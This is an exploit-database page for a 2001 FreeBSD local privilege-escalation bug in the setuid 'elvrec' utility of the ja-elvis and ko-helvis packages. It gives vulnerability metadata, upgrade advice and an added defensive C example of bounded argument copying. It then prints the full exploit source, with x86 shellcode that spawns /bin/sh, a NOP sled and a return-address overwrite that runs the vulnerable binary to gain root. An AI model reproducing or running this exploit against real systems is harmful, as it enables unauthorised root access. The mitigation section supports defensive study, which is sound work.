FreeBSD ja-elvis & ko-helvis Local Root Exploit - exploit.company

Vendor: ja-elvis and ko-helvis
By: dethy
CVSS: 7.5 (HIGH)
Vulnerability Class: Buffer Overflow
CWE: 120
Product Name: ja-elvis and ko-helvis
Affected Version From: Versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1
Affected Version To: Not provided
Patch Exists: YES
Related CWE: Not provided
CPE: Not provided
Metasploit: Not provided
Other Scripts: Not provided
Platforms Tested: FreeBSD 3.5.1 and 4.2
Year: 2001

FreeBSD ja-elvis & ko-helvis Local Root Exploit

The ja-elvis and ko-helvis packages on FreeBSD, in versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1, contain a file recovery utility called 'elvrec' that is installed setuid root (mode 4755) by default. The utility copies a command-line argument into a fixed-size stack buffer without bounding the copy, so an overlong argument overwrites the saved return address; because the binary runs as root, a local user can exploit this to gain root privileges.

Mitigation:

Upgrade to ja-elvis-1.8.4_1 or ko-helvis-1.8h2_1 or later versions.
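The following is an added illustration of the fix class for this bug, not elvrec's source (which this page does not reproduce) and not dethy's code: a setuid utility that copies argv[1] into a fixed-size stack buffer must check the argument length against the destination before copying and fail closed, and a file-name argument has no business containing non-printable bytes such as a NOP sled or machine code, so rejecting those is a cheap second check. The buffer size PATHBUF (608, chosen only to mirror the VULN constant in the exploit below), the return codes and all function names are assumptions.

```c
/*
 * Added example: bounded handling of a caller-supplied path argument in a
 * setuid utility.  Not elvrec's source.  PATHBUF, the enum values and the
 * function names are assumptions for illustration.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define PATHBUF 608   /* assumed fixed stack buffer size (mirrors VULN) */

/* Return codes of validate_and_copy() (assumed names). */
enum { ARG_OK = 0, ARG_TOO_LONG = -1, ARG_BAD_CHAR = -2 };

/*
 * The unsafe pattern this replaces is an unbounded copy such as
 *     char buf[PATHBUF];  strcpy(buf, argv[1]);
 * where an argument longer than PATHBUF runs past buf and over the saved
 * return address.  The hardened form below checks the length first, copies
 * only when the whole argument plus its terminator fits, and refuses bytes
 * that cannot appear in a legitimate file name.
 */
int validate_and_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    size_t i;

    if (n >= dstsz)                  /* must leave room for the NUL */
        return ARG_TOO_LONG;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)src[i];
        if (!isprint(c))             /* 0x90 sleds and shellcode are not printable */
            return ARG_BAD_CHAR;
    }
    memcpy(dst, src, n + 1);         /* n + 1 <= dstsz, so this is in bounds */
    return ARG_OK;
}

/* Entry point a setuid tool would use: copy the argument into a local buffer. */
int recover_file(const char *arg)
{
    char buf[PATHBUF];
    int rc = validate_and_copy(buf, sizeof buf, arg);

    if (rc != ARG_OK) {
        fprintf(stderr, "rejected argument (%s)\n",
                rc == ARG_TOO_LONG ? "too long" : "non-printable byte");
        return rc;
    }
    /* real recovery logic would operate on buf here */
    return ARG_OK;
}

/* Helper for checking the length bound: builds a constructed argument of
 * `len` 'A' bytes and reports how the validator treats it. */
int probe_arg_length(size_t len)
{
    char *arg = malloc(len + 1);
    int rc;

    if (arg == NULL)
        return ARG_TOO_LONG;
    memset(arg, 'A', len);
    arg[len] = '\0';
    rc = recover_file(arg);
    free(arg);
    return rc;
}

/* Helper for checking the byte filter on an arbitrary constructed argument. */
int probe_arg(const char *arg)
{
    return recover_file(arg);
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 2;
    }
    return recover_file(argv[1]) == ARG_OK ? 0 : 1;
}
```

The length check runs before the byte filter, so a 1024-byte argument like the one the exploit builds is rejected on size alone; an argument of exactly PATHBUF bytes is also rejected, since the terminator would not fit.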

Exploit-DB raw data:

/*
 * ja-elvis & ko-helvis - FreeBSD 3.5.1 & 4.2 ports package local root exploit
 *
 * vulnerable: versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1
 *
 * The above two packages contain a file recovery utility 'elvrec', installed
 * suid root(4755) by default. The utility is subject to a buffer overflow
 * leading to root privileges:
 *
 * Usage: ./elvwreck <offset> <alignment>
 *
 * dethy@synnergy.net // www.synnergy.net
 * 28 Feb 2001.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>		// strlen, memcpy, memset
#include <unistd.h>		// execlp
#define PROG	"/usr/local/bin/elvrec"
#define VULN	608		// distance to the saved return address
#define BSIZE	1024
#define NOP	0x90
#define ESP	0xbfbff92c	// FreeBSD 4.2
#define OFFSET	0
#define EATME	1		// byte alignment

char shellcode[]=
  "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
  "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
  "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
  "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
  "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
  "\x02\x02\x02/bin/sh.-c.sh";

int main(int argc, char *argv[]) {
  char buffer[BSIZE];
  long address=ESP;
  int i, offset, align;

  // both arguments are required together; otherwise use the defaults
  if(argc > 2) { offset = atoi(argv[1]); align = atoi(argv[2]); }
  else { offset = OFFSET; align = EATME; }

  address += offset;
  fprintf(stderr, "\n* using ret %#lx -> align %d -> offset %d\n\n", address, align, offset);

  memset(buffer, NOP, BSIZE);	// no uninitialised bytes before 'align'
  // repeated return address up to VULN, then a NOP sled, then the shellcode
  for(i=align; i<VULN; i+=4){ *(long *)&buffer[i] = address; }
  for(i=VULN; i<(int)(BSIZE - strlen(shellcode) - 100); i++){ buffer[i] = NOP; }
  memcpy(buffer+i, shellcode, strlen(shellcode));
  buffer[BSIZE-1] = '\0';	// terminate inside the array (original wrote buffer[BSIZE])

  if(execlp(PROG, "elvrec", buffer, (char *)NULL)) {
    fprintf(stderr, "Unable to execute %s\n\n", PROG);
    exit(1);
  }
  return 0;
}


// milw0rm.com [2001-03-03]